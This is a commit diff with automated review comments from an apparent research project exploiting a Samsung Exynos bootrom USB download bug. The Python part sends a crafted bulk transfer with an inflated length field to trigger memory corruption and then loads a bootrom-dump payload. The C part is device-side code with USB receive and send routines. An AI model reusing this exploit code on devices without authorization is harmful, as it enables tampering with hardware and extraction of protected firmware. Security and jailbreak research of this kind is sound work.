working usb send
parent
a9def4a27d
commit
8c1f008deb
@ -82,7 +82,7 @@ class ExynosDevice():
|
||||
# self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
|
||||
|
||||
transferred = ctypes.c_int()
|
||||
bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
||||
bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
||||
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
|
||||
assert res == 0
|
||||
@ -91,8 +91,10 @@ class ExynosDevice():
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
||||
assert res == 0
|
||||
|
||||
payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200))
|
||||
payload = b"\xaa" * 0x200
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
||||
while True:
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
|
||||
pass
|
||||
|
||||
def test_bug(self):
|
||||
@ -278,6 +280,7 @@ if __name__ == "__main__":
|
||||
# wait_for_device()
|
||||
exynos = ExynosDevice()
|
||||
exynos.test_bug_2()
|
||||
sys.exit(0)
|
||||
path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
|
||||
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
|
||||
exynos.exploit(open(path, "rb").read())
|
||||
|
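Review bot: The bulk transfers that follow `payload = b"\xaa" * 0x200`, including the one inside `while True:`, discard `res`, while the transfers above them are checked with `assert res == 0`. Inside the loop a disconnect or stall comes back as a non-zero libusb code that is ignored, so the loop has no exit path and the method never returns; a check such as `if res not in (0, libusb1.LIBUSB_ERROR_TIMEOUT): break` would at least stop on a real error. An explicit `raise RuntimeError(f"bulk transfer failed: {res}")` would also be safer than `assert`, which is stripped under `python -O` and hides the error code. In the `__main__` hunk, `sys.exit(0)` after `exynos.test_bug_2()` makes the `exynos.exploit(...)` lines below it unreachable, which deserves a comment if it is intentional. The +/- markers are lost in this rendering and the enclosing method starts outside the hunk, so which of these lines are new is inferred from the hunk counts.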
62
test_dwc3.c
62
test_dwc3.c
@ -10,25 +10,16 @@ extern void sleep(int endpoint,uint32_t timeout);
|
||||
#define recv_buffer 0x02021800 + 0x2000
|
||||
#define data_received 0x02021800 + 0x2004
|
||||
|
||||
// do {
|
||||
// /* loops until image has been received */
|
||||
// usb_event_handler();
|
||||
// iVar2 = download_ready?(); #TODO, set some global to indicate readyness
|
||||
// } while (iVar2 == 0);
|
||||
|
||||
void recv_data_cb(uint32_t endpoint, uint32_t len){
|
||||
void *rbuf;
|
||||
void *dest_buf = (void *)recv_buffer;
|
||||
volatile void *dref = (void *)data_received;
|
||||
|
||||
rbuf = get_endpoint_buffer(endpoint);
|
||||
for(int i= 0; i < len; i++){
|
||||
rbuf = get_endpoint_buffer(2);
|
||||
*(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
|
||||
}
|
||||
// while(1){}
|
||||
// asm("mov x0, #0x0");
|
||||
// asm("br x0");
|
||||
*(uint8_t *)dref = 3;
|
||||
*(uint8_t *)dref = 1; // Mark as ready
|
||||
}
|
||||
|
||||
void recv_data(){
|
||||
@ -38,18 +29,61 @@ void recv_data(){
|
||||
volatile void *dref = (void *)data_received;
|
||||
*(uint8_t *)dref = 0;
|
||||
|
||||
maybe_usb_setup_read(2, recv_data_cb, 1);
|
||||
maybe_usb_setup_read(2, recv_data_cb, 0x200);
|
||||
void *rbuf = get_endpoint_buffer(2);
|
||||
dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200);
|
||||
while(1){
|
||||
usb_event_handler();
|
||||
if(*(uint8_t *)dref == 3){
|
||||
if(*(uint8_t *)dref == 1){
|
||||
break;
|
||||
}
|
||||
sleep(1, 10);
|
||||
}
|
||||
}
|
||||
|
||||
void send_data(uint32_t *address, uint32_t size)
|
||||
{
|
||||
// asm("stp x29, x30, [sp,#-48]!");;
|
||||
// asm("mov w3, #0x0");
|
||||
// asm("bfxil w3, w1, #0, #24");
|
||||
// asm("mov w1, #0xc12");
|
||||
// asm("mov x29, sp");
|
||||
// asm("stp x19, x20, [sp,#16]");
|
||||
// asm("mov x5, #0xc834");
|
||||
// asm("mov w20, #0x1");
|
||||
// asm("movk x5, #0x1540, lsl #16");
|
||||
// asm("ldr x2, [x29,#40]");
|
||||
// asm("mov x4, #0xc838");
|
||||
// asm("orr w6, w1, w20");
|
||||
// asm("movk x4, #0x1540, lsl #16");
|
||||
// asm("mov x19, #0xc83c");
|
||||
// asm("movk x19, #0x1540, lsl #16");
|
||||
// asm("stp w3, w1, [x2,#8]");
|
||||
// asm("mov w3, #0x406");
|
||||
// asm("stp w0, wzr, [x2]");
|
||||
// asm("mov w0, w20");
|
||||
// asm("ldr x1, [x29,#40]");
|
||||
// asm("strb w6, [x2,#12]");
|
||||
// asm("mov x2, #0x27c8");
|
||||
// asm("str w1, [x5]");
|
||||
// asm("mov w1, #0x1388");
|
||||
// asm("str wzr, [x4]");
|
||||
// asm("str w3, [x19]");
|
||||
// asm("blr x2");
|
||||
// asm("mov w0, w20");
|
||||
// asm("ldr w1, [x19]");
|
||||
// asm("ldp x19, x20, [sp,#16]");
|
||||
// asm("ldp x29, x30, [sp],#48");
|
||||
// asm("ret");
|
||||
}
|
||||
|
||||
int main() {
|
||||
while(1){
|
||||
recv_data();
|
||||
send_data((uint32_t *) recv_buffer, 0x200);
|
||||
}
|
||||
|
||||
|
||||
|
||||
// recv_data();
|
||||
// sleep(1, 5000);
|
||||
asm("mov x0, #0x0");
|
||||
|
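Review bot: The copy loop in `recv_data_cb` writes every byte to the same address, `*(char *)dest_buf = ...`, so only the last received byte ends up at `recv_buffer`. The source side casts the pointer through `(int)rbuf + i`, which truncates it on a 64-bit target (the commented assembly in this file is AArch64); `((uint8_t *)dest_buf)[i] = ((uint8_t *)rbuf)[i];` fixes both. `len` is compared against a signed `int i` and has no upper bound, so once the destination is indexed it should be clamped to the 0x200 bytes requested in `recv_data`, e.g. `if (len > 0x200) len = 0x200;`. `#define recv_buffer 0x02021800 + 0x2000` also needs parentheses, since `(void *)recv_buffer` currently binds the cast to the first operand only. The +/- markers are lost in this rendering, so this assumes the loop is on the new side.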